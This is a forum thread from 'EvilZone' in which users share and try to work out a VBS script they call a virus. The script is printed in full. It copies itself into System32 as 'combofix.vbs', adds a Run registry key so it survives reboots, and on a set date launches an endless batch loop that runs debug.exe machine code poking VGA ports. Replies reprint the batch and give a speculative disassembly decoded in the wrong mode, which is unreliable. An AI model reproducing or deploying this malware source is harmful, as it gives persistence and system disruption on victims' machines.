EvilZone
Programming and Scripting => Scripting Languages => : Kulverstukas June 21, 2011, 09:53:45 PM
-
Well, I checked my supuh seecrit virus folder where I keep those legendary viruses, for no particular reason, and found this cool VBS script, that is said to make your monitor or VGA card smoke :P I don't know how true it is or that it works (don't know VBS :( too afraid to test :P )
I got it... don't know where, probably was 1nj3ct forums, one guy posted...
' 45 4c 49 58 49 41 20 42 59 20 4f 58 59 20 4f 46 20 4e 51 52 20 54 65 41 6d 20 46 4f 52 20 4b 49 52 41 20 4f 46 20 43 59 42 45 52 20 4c 49 46 45
' xirusteam
if IsDate(#25/02#) then
Dim FSO, WriteStuff, Shell
Set FSO = CreateObject("Scripting.FileSystemObject")
Set Shell = CreateObject("Wscript.Shell")
Set WriteStuff = FSO.OpenTextFile("temp.bat", 8, True)
Fso.copyfile wscript.scriptfullname, "C:\Windows\System32\combofix.vbs"
call Shell.RegWrite("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\???","C:\Windows\System32\combofix.vbs", "REG_SZ")
call MsgBox("I Was Born On The 25th And I'll Die On The 25th",65,"mizory Says:")
WriteStuff.WriteLine("@echo off")
WriteStuff.WriteLine(":bomb")
WriteStuff.WriteLine("echo e200 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\O.dbg")
WriteStuff.WriteLine("echo e210 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\O.dbg")
WriteStuff.WriteLine("echo e220 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\O.dbg")
WriteStuff.WriteLine("echo e230 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\O.dbg")
WriteStuff.WriteLine("echo g=200>>\O.dbg")
WriteStuff.WriteLine("echo q>>\O.dbg""")
WriteStuff.WriteLine("debug <\O.dbg>nul")
WriteStuff.WriteLine("del \O.dbg")
WriteStuff.WriteLine("goto bomb")
WriteStuff.Close
Shell.Run("temp.bat")
End If
-
its a program that runs on a certain date
then it outputs a msgbox
and creates a batch
and runs it but I dont know what the batch does :S
@echo off
:bomb
echo e200 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\O.dbg
echo e210 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\O.dbg
echo e220 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\O.dbg
echo e230 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\O.dbg
echo g=200>>\O.dbg
echo q>>\O.dbg""
debug <\O.dbg>nul
del \O.dbg
goto bomb
WriteStuff.Close
-
That batch uses debug to execute the following:
004012D0 B8 1300CD10 MOV EAX,10CD0013
004012D5 E4 40 IN AL,40 ; I/O command
004012D7 88C3 MOV BL,AL
004012D9 E4 40 IN AL,40 ; I/O command
004012DB 88C7 MOV BH,AL
004012DD F6E3 MUL BL
004012DF 30DF XOR BH,BL
004012E1 88C1 MOV CL,AL
004012E3 BA C80330C0 MOV EDX,C03003C8
004012E8 EE OUT DX,AL ; I/O command
004012E9 BA DA03ECA8 MOV EDX,A8EC03DA
004012EE 0875 90 OR BYTE PTR SS:[EBP-70],DH
004012F1 FB STI
004012F2 EC IN AL,DX ; I/O command
004012F3 A8 08 TEST AL,8
004012F5 ^74 FB JE SHORT test.004012F2
004012F7 BA C90388D8 MOV EDX,D88803C9
004012FC EE OUT DX,AL ; I/O command
004012FD 88F8 MOV AL,BH
004012FF EE OUT DX,AL ; I/O command
00401300 8890 90909090 MOV BYTE PTR DS:[EAX+90909090],DL
00401306 C8 EEB401 ENTER 0B4EE,1
0040130A CD 16 INT 16 ; |
0040130C ^74 CD JE SHORT test.004012DB
0040130E B8 0300CD90 MOV EAX,90CD0003
Latest versions of windows have removed debug. Also, please, some ASM coder tell us what that code does. In my limited view, it gets info from a port in the system (in), checks values, and then puts values (out) in it. That port should be the screen, I think.
-
and since the batch does this over and over, so you screen port will be overloaded?